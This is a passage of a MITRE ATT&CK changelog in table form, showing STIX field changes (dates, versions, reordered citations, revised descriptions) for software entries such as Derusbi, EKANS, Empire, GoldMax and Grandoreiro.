| external_references[4]['url'] | https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/ | https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware |
| x_mitre_version | 1.1 | 2.1 |
| Description |
|---|
| [CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:10:53.785000+00:00 | 2022-10-05 16:34:18.865000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:54:53.268000+00:00 | 2022-09-22 18:16:11.378000+00:00 |
| external_references[2]['source_name'] | Proofpoint Operation Transparent Tribe March 2016 | Kaspersky Transparent Tribe August 2020 |
| external_references[2]['description'] | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. | Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021. |
| external_references[2]['url'] | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf | https://securelist.com/transparent-tribe-part-1/98127/ |
| external_references[3]['source_name'] | Kaspersky Transparent Tribe August 2020 | Proofpoint Operation Transparent Tribe March 2016 |
| external_references[3]['description'] | Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021. | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. |
| external_references[3]['url'] | https://securelist.com/transparent-tribe-part-1/98127/ | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo) | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:59:10.146000+00:00 | 2022-04-15 15:04:10.654000+00:00 |
| description | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo) | [Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo) |
| external_references[1]['source_name'] | Derusbi | PHOTO |
| external_references[1]['description'] | (Citation: Novetta-Axiom) | (Citation: FireEye Periscope March 2018) |
| external_references[2]['source_name'] | PHOTO | Derusbi |
| external_references[2]['description'] | (Citation: FireEye Periscope March 2018) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Novetta-Axiom | Fidelis Turbo |
| external_references[3]['description'] | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. | Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf |
| external_references[4]['source_name'] | ThreatConnect Anthem | FireEye Periscope March 2018 |
| external_references[4]['description'] | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. |
| external_references[4]['url'] | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html |
| external_references[5]['source_name'] | Fidelis Turbo | Novetta-Axiom |
| external_references[5]['description'] | Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[5]['url'] | https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| external_references[6]['source_name'] | FireEye Periscope March 2018 | ThreatConnect Anthem |
| external_references[6]['description'] | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 00:05:45.283000+00:00 | 2022-10-18 22:01:45.646000+00:00 |
| external_references[1]['source_name'] | Kaspersky Dtrack | ZDNet Dtrack |
| external_references[1]['description'] | Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021. | Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021. |
| external_references[1]['url'] | https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers | https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/ |
| external_references[2]['source_name'] | Securelist Dtrack | Dragos WASSONITE |
| external_references[2]['description'] | Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021. | Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021. |
| external_references[2]['url'] | https://securelist.com/my-name-is-dtrack/93338/ | https://www.dragos.com/threat/wassonite/ |
| external_references[3]['source_name'] | Dragos WASSONITE | CyberBit Dtrack |
| external_references[3]['description'] | Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021. | Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021. |
| external_references[3]['url'] | https://www.dragos.com/threat/wassonite/ | https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ |
| external_references[4]['source_name'] | CyberBit Dtrack | Kaspersky Dtrack |
| external_references[4]['description'] | Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021. | Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021. |
| external_references[4]['url'] | https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ | https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers |
| external_references[5]['source_name'] | ZDNet Dtrack | Securelist Dtrack |
| external_references[5]['description'] | Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant's network. Retrieved January 20, 2021. | Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021. |
| external_references[5]['url'] | https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/ | https://securelist.com/my-name-is-dtrack/93338/ |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:07:19.052000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Old Description | New Description |
|---|---|
| [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 21:54:51.532000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| description | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) | [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS) |
| external_references[4]['description'] | Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021. | Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021. |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| [ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:21:32.420000+00:00 | 2022-07-26 23:33:26.355000+00:00 |
| external_references[1]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html |
| Description |
|---|
| [EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 18:17:43.966000+00:00 | 2022-01-19 18:23:52.922000+00:00 |
| external_references[3]['description'] | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021. | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021. |
| external_references[3]['url'] | https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html | https://www.prevailion.com/phantom-in-the-command-shell-2/ |
| Description |
|---|
| [Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-11 14:58:57.587000+00:00 | 2022-06-03 17:55:43.889000+00:00 |
| external_references[3]['source_name'] | NCSC Joint Report Public Tools | Github PowerShell Empire |
| external_references[3]['description'] | The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. |
| external_references[3]['url'] | https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools | https://github.com/PowerShellEmpire/Empire |
| external_references[4]['source_name'] | Github PowerShell Empire | GitHub ATTACK Empire |
| external_references[4]['description'] | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. | Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019. |
| external_references[4]['url'] | https://github.com/EmpireProject/Empire | https://github.com/dstepanic/attck_empire |
| external_references[5]['source_name'] | GitHub ATTACK Empire | NCSC Joint Report Public Tools |
| external_references[5]['description'] | Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019. | The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. |
| external_references[5]['url'] | https://github.com/dstepanic/attck_empire | https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools |
| x_mitre_version | 1.3 | 1.5 |
| Description |
|---|
| [FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 15:32:08.360000+00:00 | 2022-03-02 15:47:13.329000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) | [Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:41:41.805000+00:00 | 2022-10-12 17:51:18.408000+00:00 |
| description | Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) | [Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame) |
| external_references[2]['source_name'] | Flamer | sKyWIper |
| external_references[2]['description'] | (Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice) | (Citation: Kaspersky Flame) (Citation: Crysys Skywiper) |
| external_references[3]['source_name'] | sKyWIper | Flamer |
| external_references[3]['description'] | (Citation: Kaspersky Flame) (Citation: Crysys Skywiper) | (Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice) |
| external_references[5]['source_name'] | Symantec Beetlejuice | Crysys Skywiper |
| external_references[5]['description'] | Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017. | sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. |
| external_references[5]['url'] | https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache | https://www.crysys.hu/publications/files/skywiper.pdf |
| external_references[6]['source_name'] | Crysys Skywiper | Symantec Beetlejuice |
| external_references[6]['description'] | sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. | Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017. |
| external_references[6]['url'] | https://www.crysys.hu/publications/files/skywiper.pdf | https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache |
| Description |
|---|
| [FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 23:52:23.647000+00:00 | 2022-07-18 15:59:26.387000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 23:09:31.063000+00:00 | 2022-04-11 21:45:35.889000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 22:52:42.023000+00:00 | 2022-04-15 22:23:36.883000+00:00 |
| description | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) | [GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[1]['source_name'] | GoldMax | SUNSHUTTLE |
| external_references[1]['description'] | (Citation: MSTIC NOBELIUM Mar 2021) | (Citation: FireEye SUNSHUTTLE Mar 2021) |
| external_references[2]['source_name'] | SUNSHUTTLE | GoldMax |
| external_references[2]['description'] | (Citation: FireEye SUNSHUTTLE Mar 2021) | (Citation: MSTIC NOBELIUM Mar 2021) |
| external_references[3]['source_name'] | MSTIC NOBELIUM Mar 2021 | CrowdStrike StellarParticle January 2022 |
| external_references[3]['description'] | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. | CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. |
| external_references[3]['url'] | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ | https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ |
| external_references[4]['source_name'] | FireEye SUNSHUTTLE Mar 2021 | MSTIC NOBELIUM Mar 2021 |
| external_references[4]['description'] | Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021. | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye SUNSHUTTLE Mar 2021', 'description': 'Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html'} | |
| x_mitre_platforms | Linux |
| Description |
|---|
| [Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-29 21:37:55.776000+00:00 | 2022-07-11 20:35:28.082000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-22 21:22:34.174000+00:00 | 2022-10-19 22:11:10.040000+00:00 |
| external_references[1]['source_name'] | Securelist Brazilian Banking Malware July 2020 | ESET Grandoreiro April 2020 |
| external_references[1]['description'] | GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020. | ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. |
| external_references[1]['url'] | https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ | https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/ |
| external_references[2]['source_name'] | ESET Grandoreiro April 2020 | Securelist Brazilian Banking Malware July 2020 |
| external_references[2]['description'] | ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. | GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020. |
